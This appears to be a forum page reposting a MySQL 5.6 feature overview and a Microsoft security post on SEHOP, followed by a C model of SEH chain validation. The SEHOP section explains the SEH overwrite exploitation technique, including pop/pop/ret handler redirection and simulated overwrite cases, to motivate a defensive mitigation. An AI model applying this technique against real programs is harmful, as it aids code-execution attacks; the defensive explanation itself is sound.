The ever-increasing performance demands of web-based services have generated significant interest in providing NoSQL access methods to MySQL – maintaining all of the advantages of your existing relational database infrastructure, while providing blazing fast performance for simple queries, using an API to complement regular SQL access to your data. Using the memcached API, web services can now directly access the InnoDB storage engine without transformations to SQL, ensuring low latency and high throughput for read/write queries. Operations such as SQL parsing are eliminated and more of the server's hardware resources (CPU, memory and I/O) are dedicated to servicing the query within the storage engine itself. By using memcached, developers and DBAs are able to:
Preserve investments in memcached infrastructure by reusing existing memcached clients and eliminating the need for application changes.
Access the full range of memcached client libraries and platforms, providing maximum deployment flexibility and consistently high performance across all supported environments.
Extend memcached functionality by integrating a persistent, crash-safe, transactional database back-end offering ACID compliance.
The InnoDB memcached API is available in Labs.mysql.com. Read more about memcached API for InnoDB.
The MySQL Cluster 7.2 Development Milestone Release also previews a memcached interface for the NDBCLUSTER storage engine. Read more about the NoSQL interface for NDBCLUSTER. Scalability Improvements Data gets bigger. That's a fact of life. Partitioned tables help to segment that data into manageable portions, while keeping the convenience of a SQL interface to the full table. These new features make certain operations with partitions faster and more convenient. Partitioning Improvements Explicit Partition Selection With partitioned tables, MySQL can restrict processing to only the relevant portions of a big data set. Now you can directly define which partitions are used in a query, DML, or data load operation, rather than repeating all the partitioning criteria in each statement. SELECT * FROM employees PARTITION (p0, p2); DELETE FROM employees PARTITION (p0, p1); UPDATE employees PARTITION (p0) SET store_id = 2 WHERE fname = 'Jill'; SELECT e.id, s.city FROM employees AS e JOIN stores PARTITION (p1) AS s ...; Import / Export for Partitioned Tables To quickly bring a new data set into a partitioned table, or to export a partition or subpartition to manage it as a regular table, you can use the syntax ALTER TABLE ... EXCHANGE PARTITION. You specify a partition or subpartition of a partitioned table, and a non-partitioned table with a compatible structure, and this operation swaps their places without any expensive copy operation. ALTER TABLE e EXCHANGE PARTITION p0 WITH TABLE e2; This operation works with any storage engine that supports partitioned tables. Replication Improvements Replication is a fruitful area for enhancements to data integrity, availability, and let's not forget performance. 
Replication Improvements to Performance

Optimized Row-Based Replication
By only replicating partial "before" and "after" images for INSERT, UPDATE and DELETE events where primary keys or explicit columns were set in the SQL statement, performance can be increased while binary log disk space, network resources and server memory footprint are reduced.

Multi-Threaded Slaves
Replication performance is improved by using multiple execution threads to apply replication events to slave servers. The multi-threaded slave splits work between worker threads based on the database name, allowing updates to be applied in parallel rather than sequentially. As a result, replication throughput is increased and latency is reduced, which minimizes the risk of replication lag, enabling slaves to serve the freshest updates to the application. The multi-threaded slave functionality is available now as part of the snapshot-next-mr-wl5563-labs build, which can be downloaded from Labs.mysql.com.

Replication Improvements to Data Integrity

Crash-Safe Slaves
Extends the robustness and ease-of-use of MySQL replication by making the slaves crash-safe when using transactional storage engines such as InnoDB. The slave can automatically recover from a failure and resume replicating DML updates, without the DBA having to access the master.info and relaylog.info files to manually roll back replication to the last successfully committed transaction, or to skip transactions. As a result, data integrity is enhanced and DBAs are free to concentrate on more strategic data management activities.

Replication Checksums
Ensures the integrity of data being replicated to a slave by detecting data corruption and returning an error, preventing the slave itself from becoming corrupt. Checksums are implemented in the binary and relay logs as well as for individual replication events, allowing errors to be detected whether they are caused by memory, disk or network failures, or by the database itself. Checksum checking can be enabled on a per-slave basis, giving maximum flexibility in how and where it is deployed.

Time-Delayed Replication
You can define a time delay for events to be replicated from a master to each slave, defined in millisecond increments up to a maximum of 68 years! Time-Delayed Replication affords protection against operational errors made on the master, for example accidentally dropping tables, in which event the slave can be promoted to the new master in order to restore the database to its previous state. Time-Delayed Replication can also be useful in testing application behavior by emulating instances of replication lag. Time-Delayed Replication is implemented at the per-slave level (via holding execution of the SQL_THREAD), so you could configure multiple slaves to apply replication events immediately, and another slave to apply them only after a delay of 5 minutes, therefore providing deployment flexibility.

Replication Improvements to Usability

Informational Log Events
Enhances auditing and debugging when using Row-Based Replication by writing the original query to the binary log, which is then replicated with its associated row-based event to the slave.

Remote Binlog Back-up
Enhances operational efficiency by using the replication channel to create real-time back-ups from the binary log. By adding a "raw" flag, the binlog is written out to remote back-up servers, without having a MySQL database instance translating it into SQL statements, and without the DBA needing SSH access to each master server.

Server UUIDs
Automatically generates a Universally Unique Identifier (UUID) for each server, allowing MySQL Enterprise Monitor or any other monitoring tool to retrieve information about master and slave servers in a replication configuration. The UUID is available through a SQL query and in the output of the SHOW SLAVE STATUS command. This technique requires fewer database connections and works better with servers that are monitored remotely or that use virtual IP addresses. This feature is especially useful in large and highly dynamic replication environments, making auto-discovery more reliable and simplifying systems management.

Instrumentation and Diagnostic Improvements via PERFORMANCE_SCHEMA

MySQL 5.6 greatly enhances the PERFORMANCE_SCHEMA features for performance monitoring and tuning. The information in the performance_schema tables lets you see how various low-level items factor into overall database performance, which ones are the "hottest" under various workloads and system configurations, and trace issues back to the relevant file and line in the source code so you can really see what's happening behind the scenes. Read more about Performance Schema.

Reduced Overhead
The performance_schema code is further tuned in 5.6 to reduce the performance overhead of running with this feature enabled.

Table I/O Instrumentation
The setup_object table enables a DBA to understand, analyze, and tune how an application generates I/O load related to table access on the MySQL database server.

Table Locks Instrumentation
The setup_object table enables a DBA to identify "hot tables" and other object-related bottlenecks caused by the data access patterns of an application.

Session/User Level Instrumentation
The setup_actors table enables a DBA to monitor the load generated from a specific user or application by selectively instrumenting specific end user/application connections. This is valuable to narrow down the monitoring data collected: a) by thread or session, b) by connections originating from a given user account, c) by connections originating from a given machine, d) by connections originating from a given user account on a given machine. Reducing the number of instrumented connections also reduces the runtime overhead of the instrumentation in production.
Global Performance Metric Summaries
Globally aggregates the data collected by the PERFORMANCE_SCHEMA by thread / by object / by instrumentation point. Enables the DBA to write monitoring scripts and applications.

Table/Index I/O Summary
The setup_object table aggregates table I/O data collected by the PERFORMANCE_SCHEMA, by index and by table. Aggregation shows which tables or indexes are "hot" and most used by an application, and helps to identify the application's data access patterns.

Table Lock Wait Summary
Aggregates table lock data collected by the PERFORMANCE_SCHEMA by table. This aggregation shows which "hot" tables are often locked by an application, and helps to identify the application bottlenecks caused by table locking.

Statement-Level Instrumentation
Enables a DBA to monitor statement execution, collect per-statement metrics, and analyze statements/executions by end user session or as global aggregates. Quantify which statements are generated by an application, their execution times/counts and access paths. Metrics reported give insight on the data volumes, the selectivity of WHERE clauses, and index usage patterns. Available in Labs.mysql.com.

Show Contents of Host Cache - centralized logging of connection errors
(Highly requested by customers and community users. Delivered via community code contribution.) Provides centralized logging of connection-related errors. The MySQL internal host cache has been instrumented and exposed in a relational table for SQL access, providing centralized logging of connection errors, with details about the exact root cause (SSL, DNS, authentication plugins, ...). This enables a DBA to easily troubleshoot large deployments involving numerous users and heterogeneous applications. Available from Labs.mysql.com.

Next Steps:

Now that you have read about all the exciting new performance and scalability improvements, it's your turn to take MySQL 5.6 for a spin:

- Download MySQL 5.6: MySQL :: MySQL Downloads. For the more experimental features listed here, get them at MySQL :: MySQL Server Snapshots.
- Read the MySQL 5.6 docs: MySQL :: MySQL Documentation: MySQL Reference Manuals
- Blog about your experience: Planet MySQL
- Join the discussion: MySQL :: MySQL Forums

Sursa: MySQL :: What's New in MySQL 5.6
-
Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP
swiat, 2 Feb 2009 5:53 PM

One of the responsibilities of Microsoft's Security Engineering Center is to investigate defense in depth techniques that can be used to make it harder for attackers to successfully exploit a software vulnerability. These techniques are commonly referred to as exploit mitigations and have been delivered to users in the form of features like /GS, Data Execution Prevention (DEP), and Address Space Layout Randomization (ASLR). In Windows Server 2008 and Windows Vista SP1, Microsoft released support for a new platform mitigation known as Structured Exception Handler Overwrite Protection (SEHOP). The purpose of this article is to explain the problem this feature is attempting to solve, how it goes about solving it, and what you can do to take advantage of it.

The exploitation technique: SEH overwrites

The purpose of the SEHOP mitigation is to prevent an attacker from being able to make use of the Structured Exception Handler (SEH) overwrite exploitation technique. This exploitation technique was publicly documented by David Litchfield of NGS Software in a research paper that he published in September, 2003[1]. Since this publication, the SEH overwrite technique has become a standard weapon in an attacker's arsenal. Roughly 20% of the exploits included in the latest version of the Metasploit framework make use of the SEH overwrite technique. SEH overwrites are also commonly used by exploits that target the increasing number of browser-based vulnerabilities[4].

At a high level, the SEH overwrite technique uses a software vulnerability to execute arbitrary code by abusing the 32-bit exception dispatching facilities provided by Windows. At a functional level, an SEH overwrite is generally accomplished by using a stack-based buffer overflow to overwrite an exception registration record that has been stored on a thread's stack.

To provide some context, an exception registration record is composed of two fields: a next pointer and an exception handler function pointer. The next pointer is used to link an exception registration record to the next record in the singly-linked list of registered exception handlers. The exception handler function pointer is called by the Windows exception dispatcher when an exception occurs. The definition for an exception registration record can be seen below:

    typedef struct _EXCEPTION_REGISTRATION_RECORD {
        struct _EXCEPTION_REGISTRATION_RECORD *Next;
        PEXCEPTION_ROUTINE Handler;
    } EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;

After an exception registration record has been overwritten, an exception must be raised so that the exception dispatcher will attempt to handle it. This can be accomplished in a number of ways, such as by overwriting a return address on the stack with a bogus address in order to cause an access violation exception to be raised. When an exception is raised, the exception dispatcher will attempt to enumerate the list of exception registration records for the thread and call the exception handler that is associated with each record. By corrupting the next pointer and exception handler function pointer of one of the exception registration records, the exception dispatcher can be made to execute code from an arbitrary address as specified by the corrupt exception handler function pointer.

In many cases, an attacker will choose to overwrite the exception handler function pointer with an address that contains instructions that are equivalent to a pop reg, pop reg, ret. This allows an attacker to reliably execute arbitrary code by transferring control to the EstablisherFrame that the exception dispatcher passes as the second parameter when calling an exception handler. This works because the EstablisherFrame parameter holds the address of the attacker-controlled exception registration record. Attackers have also used heap spraying in conjunction with an SEH overwrite to reliably execute arbitrary code. The following diagram illustrates what an SEH overwrite would typically look like from an exploitation perspective:

The mitigation technique: SEHOP

There are two general approaches that can be considered when attempting to mitigate the SEH overwrite exploitation technique. The first approach involves making changes to the compiled versions of code such that executable files are made to contain metadata that the platform would need to properly mitigate this technique. Microsoft pursued this approach and released a functional mitigation with Visual Studio 2003. This mitigation took the form of a new linker flag known as /SAFESEH. Unfortunately, the need to rebuild executables, in combination with the inability to completely handle cases where an exception handler is pointed outside of an image file, makes the SafeSEH approach less attractive. The details relating to how SafeSEH works are beyond the scope of this article, but more information can be found on MSDN[2].

The second approach involves adding dynamic checks to the exception dispatcher that do not rely on having metadata derived from a binary. This is the approach taken by SEHOP.

At a high level, SEHOP prevents attackers from being able to use the SEH overwrite technique by verifying that a thread's exception handler list is intact before allowing any of the registered exception handlers to be called. This mitigation technique is made possible because of an implicit side effect of an SEH overwrite. When the majority of stack-based buffer overflows occur, an attacker will implicitly overwrite the next pointer of an exception registration record prior to overwriting the record's exception handler function pointer. Since the next pointer is corrupted, the integrity of the exception handler chain is broken. This insight, in combination with ASLR, is what allows SEHOP to effectively mitigate SEH overwrites.

From an implementation perspective, SEHOP achieves this functionality in two distinct steps. The first step involves the insertion of a symbolic exception registration record as the tail record in a thread's exception handler list. This step occurs when a thread first begins executing in user mode. Since exception registration records are always inserted at the head of the exception handler list, the symbolic record is guaranteed to be the final exception registration record. The second step consists of walking the exception handler list at the time that an exception is being dispatched to ensure that the symbolic record can be reached and that it is valid. This step happens when the exception dispatcher is notified that an exception has occurred in user mode. If the symbolic record cannot be reached, the exception dispatcher can assume that the exception handler list is corrupt and that an SEH overwrite may have occurred. The exception dispatcher is then able to safely terminate the process. If the symbolic record is found, the exception dispatcher is able to proceed as it normally would and call each of the registered exception handlers. An illustration of this logic can be seen in the following diagram:

How you can use SEHOP

SEHOP is enabled by default on Windows Server 2008 and disabled by default on Windows Vista SP1. The primary reason this feature was disabled by default on Windows Vista SP1 was a lack of adequate application compatibility data. KB article 956607 documents how SEHOP can be enabled or disabled on a system-wide basis[3].

Wrapping up

We are continuing to investigate new and enhanced exploit mitigation techniques and feel that SEHOP is a valuable addition that can help protect users. We encourage users to enable this feature if it is not enabled by default in order to better protect themselves against the SEH overwrite exploitation technique. For more information about the origins of SEH overwrites and SEHOP, it may be helpful to refer to the cited work[1,5].

Matt Miller, MSEC Security Science

*Posting is provided "AS IS" with no warranties, and confers no rights.*

References
[1] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server. Sep, 2003.
[2] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers). MSDN.
[3] Microsoft Corporation. How to enable Structured Exception Handling Overwrite Protection (SEHOP) in Windows operating systems. KB 956607.
[4] Microsoft Corporation. Microsoft Security Intelligence Report volume 5. Nov, 2008.
[5] skape. Preventing the Exploitation of SEH Overwrites. Uninformed, vol. 5, article 2. Sep, 2006.

Sursa: Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP - Security Research & Defense - Site Home - TechNet Blogs
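The chain walk described in the SEHOP post above, as an added example that is not Microsoft's code and not part of the original post: a portable user-land C model of the 32-bit exception registration list and of a SEHOP-style validation over it. The record layout follows the EXCEPTION_REGISTRATION_RECORD shown in the post; everything else (final_exception_handler as a stand-in for ntdll's FinalExceptionHandler, pop_pop_ret_gadget as the address an attacker would plant, the thread_stack_t "stack", and the in-stack bounds and alignment check that the real dispatcher performs before touching a record) is an assumption made for the example. It shows the intact chain passing, the classic overwrite failing because Next is clobbered before Handler, a forged in-stack tail failing because the attacker cannot supply the ASLR-randomized symbolic handler, and a looping chain being rejected instead of walked forever.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Added example, not Microsoft's code: a user-land model of the 32-bit SEH
 * chain from the post and of the SEHOP walk it describes. Record layout
 * mirrors EXCEPTION_REGISTRATION_RECORD; the handlers, gadget stub and
 * thread_stack_t are stand-ins invented for this example. */

typedef void (*exception_routine_t)(void);

typedef struct exception_registration_record {
    struct exception_registration_record *Next;
    exception_routine_t Handler;
} exception_registration_record_t;

/* The real list is terminated by Next == 0xFFFFFFFF. */
#define EXCEPTION_CHAIN_END ((exception_registration_record_t *)(uintptr_t)-1)

enum { CHAIN_OK = 0, CHAIN_CORRUPT = 1 };

static void final_exception_handler(void) {}  /* stand-in for ntdll's FinalExceptionHandler */
static void app_handler(void) {}              /* a handler registered by application code */
static void pop_pop_ret_gadget(void) {}       /* stand-in for the address an attacker plants */

/* SEHOP-style validation. Every record must lie inside the thread's stack and
 * be pointer-aligned (the dispatcher checks this before dereferencing), the walk
 * must reach the terminator without cycling, and the last record must carry the
 * symbolic handler. That handler lives in ntdll, so ASLR keeps an attacker from
 * forging a tail record that passes the final comparison. */
int validate_seh_chain(const exception_registration_record_t *head,
                       const void *stack_lo, const void *stack_hi,
                       exception_routine_t symbolic_handler)
{
    const exception_registration_record_t *rec = head, *last = NULL;
    size_t max_records = (size_t)((const char *)stack_hi - (const char *)stack_lo) / sizeof *rec;
    size_t n = 0;

    while (rec != EXCEPTION_CHAIN_END) {
        uintptr_t a = (uintptr_t)rec;
        if (a < (uintptr_t)stack_lo || a + sizeof *rec > (uintptr_t)stack_hi ||
            a % sizeof(void *) != 0)
            return CHAIN_CORRUPT;            /* bogus Next, e.g. 0x41414141 from the overflow */
        if (n++ >= max_records)
            return CHAIN_CORRUPT;            /* cycle: more records than the stack can hold */
        last = rec;
        rec = rec->Next;
    }
    if (last == NULL || last->Handler != symbolic_handler)
        return CHAIN_CORRUPT;                /* terminator reached, but not via the symbolic record */
    return CHAIN_OK;
}

/* Constructed model of one thread's stack: the symbolic record is inserted at
 * thread start, the application record is registered later (head of the list),
 * and `forged` stands for attacker-controlled bytes left behind by an overflow. */
typedef struct {
    exception_registration_record_t symbolic;
    exception_registration_record_t app;
    exception_registration_record_t forged;
} thread_stack_t;

static void init_chain(thread_stack_t *t)
{
    t->symbolic.Next = EXCEPTION_CHAIN_END;
    t->symbolic.Handler = final_exception_handler;
    t->app.Next = &t->symbolic;
    t->app.Handler = app_handler;
    memset(&t->forged, 0, sizeof t->forged);
}

static int validate(const thread_stack_t *t)
{
    return validate_seh_chain(&t->app, t, (const char *)t + sizeof *t, final_exception_handler);
}

int check_intact_chain(void)
{
    thread_stack_t t;
    init_chain(&t);
    return validate(&t);                     /* CHAIN_OK */
}

/* Classic SEH overwrite: the overflow runs through Next ("AAAA") before it
 * reaches Handler, which the attacker points at a pop/pop/ret sequence. */
int check_classic_overwrite(void)
{
    thread_stack_t t;
    init_chain(&t);
    memset(&t.app.Next, 'A', sizeof t.app.Next);
    t.app.Handler = pop_pop_ret_gadget;
    return validate(&t);                     /* CHAIN_CORRUPT: Next points outside the stack */
}

/* Attacker who knows about SEHOP: repairs Next to point at a forged in-stack
 * record that terminates the list, but cannot know the randomized address of
 * the symbolic handler, so the forged tail fails the final check. */
int check_forged_tail(void)
{
    thread_stack_t t;
    init_chain(&t);
    t.forged.Next = EXCEPTION_CHAIN_END;
    t.forged.Handler = pop_pop_ret_gadget;   /* wrong guess for FinalExceptionHandler */
    t.app.Next = &t.forged;
    t.app.Handler = pop_pop_ret_gadget;
    return validate(&t);                     /* CHAIN_CORRUPT */
}

/* Next pointed back at the record itself: the walk must terminate. */
int check_self_loop(void)
{
    thread_stack_t t;
    init_chain(&t);
    t.app.Next = &t.app;
    return validate(&t);                     /* CHAIN_CORRUPT */
}

int main(void)
{
    printf("intact=%d classic=%d forged=%d loop=%d\n", check_intact_chain(),
           check_classic_overwrite(), check_forged_tail(), check_self_loop());
    return 0;
}
```

Build with any C11 compiler (for example `cc -std=c11 -Wall seh_model.c`); the four checks report 0 for the intact chain and 1 for each corrupted one. The bounds check is what lets the walk safely reject a clobbered Next without dereferencing it, and the final handler comparison is where ASLR does the real work: a forged record can satisfy every structural check except the one value the attacker cannot predict.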